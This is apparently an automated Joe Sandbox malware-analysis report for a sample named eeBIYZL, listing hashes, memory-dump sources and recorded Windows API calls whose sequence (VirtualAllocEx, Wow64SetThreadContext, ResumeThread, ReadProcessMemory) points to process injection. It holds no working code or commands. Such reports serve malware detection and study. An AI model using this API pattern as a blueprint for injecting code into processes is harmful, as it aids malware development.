                                  • Instruction Fuzzy Hash: 782125B1C002599FCB10DFAAD884AEEBBF5FF48310F14842EE559A7250C7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502D198
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: ef5b4a2174d49de34de2960c4fb41ecfa2ab0cff259fb759c802fb92fd7c7f62
                                  • Instruction ID: a785371323d5c0d13860b907732d5ed393ac0833cf717935cd0d9517ef38de49
                                  • Opcode Fuzzy Hash: ef5b4a2174d49de34de2960c4fb41ecfa2ab0cff259fb759c802fb92fd7c7f62
                                  • Instruction Fuzzy Hash: 692138B1C003599FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250C7389945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 721 502ce90-502cedb 723 502ceeb-502cf1b Wow64SetThreadContext 721->723 724 502cedd-502cee9 721->724 726 502cf24-502cf54 723->726 727 502cf1d-502cf23 723->727 724->723 727->726
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0502CF0E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: e69c273cbcca09b6554ed9ad6387625613af0c7da19f99a241a9b314ac49518a
                                  • Instruction ID: 7eff472e0943fa3a4acb4c48adbef9cc5ac6885567e398d8a37f7ce3933dcc64
                                  • Opcode Fuzzy Hash: e69c273cbcca09b6554ed9ad6387625613af0c7da19f99a241a9b314ac49518a
                                  • Instruction Fuzzy Hash: D62135B19043099FDB50DFAAC4857AEBBF4FF48324F14842AD519A7240CB78A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FDAC7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: d2e1696aa9305bf55fbd53588fa5d338095e7f910c89eb9f3a7d92277d9175bf
                                  • Instruction ID: 8a97ac5ca53de61f26a18fa25b3a4d7e30f62c4b4f9264add5d38eb61755df5a
                                  • Opcode Fuzzy Hash: d2e1696aa9305bf55fbd53588fa5d338095e7f910c89eb9f3a7d92277d9175bf
                                  • Instruction Fuzzy Hash: 7621C4B59013489FDB10CF9AD584AEEBBF9FB48310F14841AE918A3350D379A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009FB841,00000800,00000000,00000000), ref: 009FBA52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 25fc899cc22a7a34408e42daf85c2590dc71edbbdb4bb30d4409fd21ea245146
                                  • Instruction ID: a79af771db14590b0d319c3baa448f81ce963b4b2395546542d6a315b3e64096
                                  • Opcode Fuzzy Hash: 25fc899cc22a7a34408e42daf85c2590dc71edbbdb4bb30d4409fd21ea245146
                                  • Instruction Fuzzy Hash: 111117B58003089FCB20CF9AD444AAEFBF9EB48310F10842AD519A7200C379A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502CFD6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 8682b6947b9871f585efd1ac318f04f527220d9e04615a89ccd78eae31e42886
                                  • Instruction ID: 932b1f1d4a13237c45e4a002cadfae85480bc7a41dc0c3f97bf0dc7a42578c94
                                  • Opcode Fuzzy Hash: 8682b6947b9871f585efd1ac318f04f527220d9e04615a89ccd78eae31e42886
                                  • Instruction Fuzzy Hash: 171129718042499FDB20DFAAD845AEFBFF5FF48310F14841AE519A7250C7759944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009FB841,00000800,00000000,00000000), ref: 009FBA52
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: bb16e6465d3e205e953970bcb3ffa11e79ea0d0aea348ac62376d39a0f123674
                                  • Instruction ID: fec6928fee0cbcea46418d08ac1a4ba26bd7dbafce82d5f59104995a0b4b1f75
                                  • Opcode Fuzzy Hash: bb16e6465d3e205e953970bcb3ffa11e79ea0d0aea348ac62376d39a0f123674
                                  • Instruction Fuzzy Hash: 981114B6C003489FDB20CFAAD484AEEFBF5AF48310F14842ED519A7200C379A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502CFD6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d802ecc9c9403e02badebc48b4fea277bb59552938407a5634bfd481689ad4c4
                                  • Instruction ID: 6d78b6fdb8029dd77d95a355e552678a67060c2405ee13226938a4167951f74f
                                  • Opcode Fuzzy Hash: d802ecc9c9403e02badebc48b4fea277bb59552938407a5634bfd481689ad4c4
                                  • Instruction Fuzzy Hash: 0C1149718042499FDB10DFAAD845AEFBFF5FF48320F108419E519A7250C779A940CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 28582eddae5ee12c41801bcb0deab2e45d9aeb948ea7d57b38ac8bb1c73c778a
                                  • Instruction ID: fb11bb61c0f526c54912847c0e66194f7369ad1a4ca160f3a95bf5661f7449f6
                                  • Opcode Fuzzy Hash: 28582eddae5ee12c41801bcb0deab2e45d9aeb948ea7d57b38ac8bb1c73c778a
                                  • Instruction Fuzzy Hash: B01146B1D002488EDB20DFAAD4447EEBBF5BF88324F20841AD519A7240C7799944CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 67397314cd9639423acb97dc345b3f8b543b49a94d556c97d6385dc7b4f38a13
                                  • Instruction ID: ac90e2fdfa40efb95ac51986c6789a8d69e9d162e021bb02f2813f31f1211642
                                  • Opcode Fuzzy Hash: 67397314cd9639423acb97dc345b3f8b543b49a94d556c97d6385dc7b4f38a13
                                  • Instruction Fuzzy Hash: B81125B19003488BDB20DFAAD4457AEFBF5FF88324F20841AD519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB7C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 04566d4dd82d2b48f6bba2b3741427b13f18c0a97c955956ed8034d7d63d0587
                                  • Instruction ID: 850c1db8bf26023c8772c33e2c6b7265f5d42af47a5577796be907a1b29bcd6c
                                  • Opcode Fuzzy Hash: 04566d4dd82d2b48f6bba2b3741427b13f18c0a97c955956ed8034d7d63d0587
                                  • Instruction Fuzzy Hash: 2E11DFB5C007498FCB20DF9AD444AAEFBF9AF89320F10842AD519A7610D379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0872125D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2136712621.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_8720000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 1b79c224a8252d459c344b9d0a6b25c89e044d818865a0747035a6337a101f45
                                  • Instruction ID: e6e5ebb340d9222b056f9ad4d2ea0c738ce17edeefad433ffb61941a82b9dbb0
                                  • Opcode Fuzzy Hash: 1b79c224a8252d459c344b9d0a6b25c89e044d818865a0747035a6337a101f45
                                  • Instruction Fuzzy Hash: 8011E3B58002599ECB10DF9AD485BDEBBF4FB48320F20851AE569A7250C379A984CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0872125D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2136712621.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_8720000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 6a3885970576955f866179eae37e495e9765d436778544995140eef6002e9b73
                                  • Instruction ID: cacb8fe2cc15dbb3280e9f1f5756b5255923346c0440f1823438a7fa96b8eb41
                                  • Opcode Fuzzy Hash: 6a3885970576955f866179eae37e495e9765d436778544995140eef6002e9b73
                                  • Instruction Fuzzy Hash: FA11C2B5800349DFDB10DF9AD585BDEBBF8FB48310F10841AE558A7200D379A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:9.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:62
                                  Total number of Limit Nodes:6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 6acc1ca712890098d0eab448b5bd830a8f3b444f049a8e293db9734f4ff7ca10
                                  • Instruction ID: 0a7ed2e706422115f8ffc62b5bbe4513066122f292e3610927bbec2d4964c12e
                                  • Opcode Fuzzy Hash: 6acc1ca712890098d0eab448b5bd830a8f3b444f049a8e293db9734f4ff7ca10
                                  • Instruction Fuzzy Hash: 71D27A30E00619CFDB64EF68C984A9DB7B2FF89300F5585A9D449AF265DB31ED85CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: c8ced2ef6557769ac0a73b91054804f4ab2b049bc6fb95cc53f88aa26b99c49f
                                  • Instruction ID: 6cad462988ef9dc65331f49dc082d5cce14f86f8beaad58cc772b40a00d3a380
                                  • Opcode Fuzzy Hash: c8ced2ef6557769ac0a73b91054804f4ab2b049bc6fb95cc53f88aa26b99c49f
                                  • Instruction Fuzzy Hash: 44525EB0E002098FDF64EF69D9907AEB7B6EB85310F208529D415DB395DB34EC85CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 9d046824520fff70db124f375692ea6224d16ea88576bee696d530b805b924db
                                  • Instruction ID: 2c30bf2455f3db7f066ffd28d1aff8313b9727a2258b8b08a8f2d72481c3f5eb
                                  • Opcode Fuzzy Hash: 9d046824520fff70db124f375692ea6224d16ea88576bee696d530b805b924db
                                  • Instruction Fuzzy Hash: 64029D30B002198FDB64EB69D994AAEB7F6FF84300F248569D815DB395DB35EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 25d09bcd189abe0bb6659196ec2d13b285597207c17215d43382852d0a5fdf8a
                                  • Instruction ID: a1cf7da2b9c55c524cacbb18007495a5aa172994957f997c898634f34b30a0d0
                                  • Opcode Fuzzy Hash: 25d09bcd189abe0bb6659196ec2d13b285597207c17215d43382852d0a5fdf8a
                                  • Instruction Fuzzy Hash: 4C22D335E002198FDF60EBA4C9806AEBBB2FF89310F248569D415AF395DB35ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455fd1416813bed1001141843055237912395cb687ca26c1757b5d08eb77cfd0
                                  • Instruction ID: adf23f3fde366030eaba1620c17ad48f76ea88aed0c66ef9c5e2e567b913e4a8
                                  • Opcode Fuzzy Hash: 455fd1416813bed1001141843055237912395cb687ca26c1757b5d08eb77cfd0
                                  • Instruction Fuzzy Hash: 7862AE30B006058FDB64EB68DA84BADB7F6EF84310F249569E406EB355DB35EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e39e2b31848b3c8e6ae78c891f2833317978f6a564408c91c432cf489a4365e
                                  • Instruction ID: ef932b1f1d9d786c6c8e1f847b6d747e0e8d049004c3739fd5773f8e40e5aebc
                                  • Opcode Fuzzy Hash: 5e39e2b31848b3c8e6ae78c891f2833317978f6a564408c91c432cf489a4365e
                                  • Instruction Fuzzy Hash: B2327034B102159FDF54EB68E994BADB7B6FB88320F208525E406EB359DB35EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: 1fcecec0936bea59a8aba89a6d2f90bb9c928ff7d2a38269e4eb6f0f3009fe0b
                                  • Instruction ID: 56af0995d45ca8fb86d7fe8203cb8424c7c7861a3ad3bb84b5928fc7f4ed30ca
                                  • Opcode Fuzzy Hash: 1fcecec0936bea59a8aba89a6d2f90bb9c928ff7d2a38269e4eb6f0f3009fe0b
                                  • Instruction Fuzzy Hash: 51E18F30E102199FDB65EF69D9906AEB7B6FF85300F208529D905EB358DB34EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 8492ccc9faf27795b83bd0342a644b979c581f9ed33f8fa3139d1e554637ae5a
                                  • Instruction ID: 8e6cc0ce88914d5664ba8b70e86f20b496b6315a2ef3d63396898a335134b552
                                  • Opcode Fuzzy Hash: 8492ccc9faf27795b83bd0342a644b979c581f9ed33f8fa3139d1e554637ae5a
                                  • Instruction Fuzzy Hash: AE910F70B0021A8FDB94EB75D9507AF77FAEF85200F108569D409AB358EF749D458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 6181e33b6856ae8a62498eb36a03d38ad856ecc1dc42c139488aecc81f6dfe5c
                                  • Instruction ID: d43253f61005d662649c3de6e7777a35f988303d72c3195fda08ad4a5d6cda06
                                  • Opcode Fuzzy Hash: 6181e33b6856ae8a62498eb36a03d38ad856ecc1dc42c139488aecc81f6dfe5c
                                  • Instruction Fuzzy Hash: 1A623030A002168FCB55EF69EA90A9DB7F6FF84304F208668D4059F369DB75ED46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: f9bddb33fec3bb4968d227e02c7856c48500b943665758b1d4ab908b08033b9f
                                  • Instruction ID: 35c42c4d7dea42292b9e5816201476f90754ee636e159a3f69df3501fd20b125
                                  • Opcode Fuzzy Hash: f9bddb33fec3bb4968d227e02c7856c48500b943665758b1d4ab908b08033b9f
                                  • Instruction Fuzzy Hash: 96618270F002199FEF54AFA9C8547AEBAF6FF88300F208529D506AB395DE759C45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 1c8cd703c7072be988c4a0571ad1e3ecfe7cf4ddc74742bbdfcc5111a37f9c16
                                  • Instruction ID: adbf989e5afdaabb7796df7dadb63524260df4cbebe20dbf1c827bf5296d5b5a
                                  • Opcode Fuzzy Hash: 1c8cd703c7072be988c4a0571ad1e3ecfe7cf4ddc74742bbdfcc5111a37f9c16
                                  • Instruction Fuzzy Hash: 1F512070B002159FDB94EB79D950BAF77FAEB89600F108569D40AEB358EF359C418B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2415 2c6781c-2c681ba 2418 2c681c2-2c681ed DeleteFileW 2415->2418 2419 2c681bc-2c681bf 2415->2419 2420 2c681f6-2c6821e 2418->2420 2421 2c681ef-2c681f5 2418->2421 2419->2418 2421->2420
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 02C681E0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 8a7513bb38d93321cdf52eaac0e72e195b29da604c1344ee353de51f282e6ccf
                                  • Instruction ID: d017272bf5be7bdb7274f39ac88915d25400025da583d677737db788d49d1a16
                                  • Opcode Fuzzy Hash: 8a7513bb38d93321cdf52eaac0e72e195b29da604c1344ee353de51f282e6ccf
                                  • Instruction Fuzzy Hash: 5D2127B1C0065A9BCB10DF9AC9447AEFBF4FF48310F108569E918B7240D738A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 02C681E0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 6b20d9fe262e01a0e31c9feac4e14e91ebd1eed141b94e82a59280ff07a5c8fd
                                  • Instruction ID: 9c5155d4a07857ff6d4035e9abd36df4951afc89d294fbf81e3798db41fcf4a0
                                  • Opcode Fuzzy Hash: 6b20d9fe262e01a0e31c9feac4e14e91ebd1eed141b94e82a59280ff07a5c8fd
                                  • Instruction Fuzzy Hash: D82127B1C0065A9FCB24CF9AD9457AEFBF0FF48310F14865AD918A7640D738AA44CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 02C6F0EF
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 0f478bf19146aef6931acc63ce0a97ae7195853dcc7c8e6e8d94a30a98bb224e
                                  • Instruction ID: 498dd5fad6a69797351e68c34a3467173e489e96a4347c80cde7f79b71227948
                                  • Opcode Fuzzy Hash: 0f478bf19146aef6931acc63ce0a97ae7195853dcc7c8e6e8d94a30a98bb224e
                                  • Instruction Fuzzy Hash: 3711E2B1C006599BCB10DF9AD544AAEFBF4AF48320F15816AD818A7240D779A944CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XPoq
                                  • API String ID: 0-2250694691
                                  • Opcode ID: 2a0b635c985722b90577474cfd311d958a4143e8b4d0eeb618bc53e6c4ffc228
                                  • Instruction ID: e02cfe497e5aa25d38eb4606480e9b20730ddfc222eeea144033f681070e49c2
                                  • Opcode Fuzzy Hash: 2a0b635c985722b90577474cfd311d958a4143e8b4d0eeb618bc53e6c4ffc228
                                  • Instruction Fuzzy Hash: 4A414F70E002199FDB55EFA5C854BAEBBF6BF88300F208529D105AB3A5DA749C05CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: fa286fcd10a5f06e841807f697f56e75e4c5fe7b9baf5dab25e00690103e1058
                                  • Instruction ID: a732f32336a68b7ce2a7753f8f727f565a1e607f0225ed570677f2d4103aaf28
                                  • Opcode Fuzzy Hash: fa286fcd10a5f06e841807f697f56e75e4c5fe7b9baf5dab25e00690103e1058
                                  • Instruction Fuzzy Hash: EE418E30E002099FDB65FF65C9946AEBBB6FF85300F104929D406EB345EB70E846CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: bf256a27e8c1f8beb6af7bda59174ba9fffa1037c401ed08a90c3dff704f4274
                                  • Instruction ID: 5d913ceb821d59417a4d12d463342ef282c578e7849ffb043184a86779c22caf
                                  • Opcode Fuzzy Hash: bf256a27e8c1f8beb6af7bda59174ba9fffa1037c401ed08a90c3dff704f4274
                                  • Instruction Fuzzy Hash: 15419F34E002099FDB65EF74C99069EBBB6FF85300F144929E402EB345EB74E846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: 88e93b3a31168e1a994c0a9d297fdada430a439fc1fe4a80a27b3ec931d28723
                                  • Instruction ID: 75eef59b2abdee242c11b581a65c727b24395560eeaee4784fc40b21befba747
                                  • Opcode Fuzzy Hash: 88e93b3a31168e1a994c0a9d297fdada430a439fc1fe4a80a27b3ec931d28723
                                  • Instruction Fuzzy Hash: 8E31E130B002158FDF59AB74D9547AE7BE6BF89600F248968C406DB395EF35DD06CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

